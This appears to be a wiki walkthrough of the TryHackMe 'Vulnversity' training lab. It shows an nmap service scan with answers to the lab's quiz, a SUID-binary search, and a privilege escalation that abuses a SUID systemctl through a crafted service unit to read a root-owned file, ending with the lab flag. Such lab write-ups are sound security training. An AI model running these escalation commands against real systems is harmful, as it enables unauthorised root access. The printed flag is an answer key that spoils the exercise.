TryHackMe-Vulnversity

From aldeid
Jump to navigation Jump to search

Vulnversity

Scan the box, how many ports are open?

There are 6 open ports:

$ nmap -sV -p- 10.10.236.222

Starting Nmap 7.60 ( https://nmap.org ) at 2020-04-29 01:23 PDT
Stats: 0:00:02 elapsed; 0 hosts completed (0 up), 1 undergoing Ping Scan
Ping Scan Timing: About 50.00% done; ETC: 01:23 (0:00:02 remaining)
Stats: 0:00:03 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Connect Scan Timing: About 0.50% done
Stats: 0:00:07 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Connect Scan Timing: About 3.18% done; ETC: 01:25 (0:02:32 remaining)
Stats: 0:00:10 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Connect Scan Timing: About 5.28% done; ETC: 01:25 (0:02:23 remaining)
Stats: 0:01:03 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Connect Scan Timing: About 46.73% done; ETC: 01:25 (0:01:11 remaining)
Nmap scan report for 10.10.236.222
Host is up (0.045s latency).
Not shown: 65529 closed ports
PORT     STATE SERVICE     VERSION
21/tcp   open  ftp         vsftpd 3.0.3
22/tcp   open  ssh         OpenSSH 7.2p2 Ubuntu 4ubuntu2.7 (Ubuntu Linux; protocol 2.0)
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
3128/tcp open  http-proxy  Squid http proxy 3.5.12
3333/tcp open  http        Apache httpd 2.4.18 ((Ubuntu))
Service Info: Host: VULNUNIVERSITY; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 348.72 seconds

What version of the squid proxy is running on the machine?

3.5.12

How many ports will nmap scan if the flag -p-400 was used?

400

Using the nmap flag -n what will it not resolve?

DNS

What is the most likely operating system this machine is running?

Ubuntu

Revealed by port 22 (nmap)

What port is the web server running on?

3333

Its important to ensure you are always doing your reconnaissance thoroughly before progressing. Knowing all open services (which can all be points of exploitation) is very important, don’t forget that ports on a higher range might be open so always scan ports after 1000 (even if you leave scanning in the background)

$ find / -user root -perm -4000 -print 2>/dev/null
/usr/bin/newuidmap
/usr/bin/chfn
/usr/bin/newgidmap
/usr/bin/sudo
/usr/bin/chsh
/usr/bin/passwd
/usr/bin/pkexec
/usr/bin/newgrp
/usr/bin/gpasswd
/usr/lib/snapd/snap-confine
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/squid/pinger
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
/bin/su
/bin/ntfs-3g
/bin/mount
/bin/ping6
/bin/umount
/bin/systemctl
/bin/ping
/bin/fusermount
/sbin/mount.cifs
$ 
$ cat > /tmp/flag.service << EOF
> [Service]
> ExecStart=/bin/bash -c "cat /root/root.txt > /tmp/flag.txt"
> [Install]
> WantedBy=multi-user.target
> EOF
$ cat flag.service
[Service]
ExecStart=/bin/bash -c "cat /root/root.txt > /tmp/flag.txt"
[Install]
WantedBy=multi-user.target
$ /bin/systemctl link /tmp/flag.service
$ /bin/systemctl enable --now /tmp/flag.service
Created symlink from /etc/systemd/system/multi-user.target.wants/flag.service to /tmp/flag.service.
$ cat flag.txt  
a58ff8579f0a9270368d33a9966c7fd5